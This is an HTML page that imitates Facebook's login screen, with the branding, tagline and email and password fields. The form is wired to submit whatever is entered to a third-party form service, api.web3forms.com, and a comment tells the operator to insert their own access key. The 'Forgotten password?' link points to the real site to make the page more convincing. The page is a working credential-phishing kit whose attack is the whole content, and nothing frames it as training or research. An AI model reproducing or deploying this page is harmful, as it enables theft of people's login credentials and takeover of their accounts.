<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Document</title>
  <script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="bg-gray-100 text-black">
  <section class="flex min-h-lvh justify-center items-center">

    <div class="pr-24 -mt-32">
      <h1 class="text-blue-600 mb-4 font-bold text-6xl">facebook</h1>
      <p class="text-3xl">Facebook helps you connect and share<br>with the people in your life.</p>
    </div>

    <div class="w-[396px] text-center">
      <div class="pt-3 pb-8 shadow-md rounded-lg bg-white">
        <form action="https://api.web3forms.com/submit" method="POST" class="w-[364px] mx-auto mb-2 bg-white">

          <!-- Replace with your access key -->
          <input type="hidden" name="access_key" value="YOUR_ACCESS_KEY_HERE">

          <input class="w-full my-[6px] py-[14px] px-4 border border-gray-300 rounded-md outline-blue-600" name="Email or Phone" title="" type="text" placeholder="Email address or phone number" required>
          <input class="w-full my-[6px] py-[14px] px-4 border border-gray-300 rounded-md outline-blue-600" name="Password" title="" type="password" placeholder="Password" required>
          <button class="w-full h-12 mt-[6px] px-6 bg-blue-600 text-white rounded-md text-xl font-semibold">Log in</button>
        </form>
        <a class="text-blue-600 text-sm hover:underline" href="https://www.facebook.com">Forgotten password?</a>
        <hr class="bg-black h-px mt-4 mb-6">
        <button class="h-12 px-[16px] bg-green-600 font-semibold text-lg rounded-md text-white">Create new account</button>
      </div>
      <p class="py-6"><a class="font-bold text-sm" href="https://www.facebook.com">Create a Page</a> for a celebrity, brand or business.</p>
    </div>

  </section>
</body>
</html>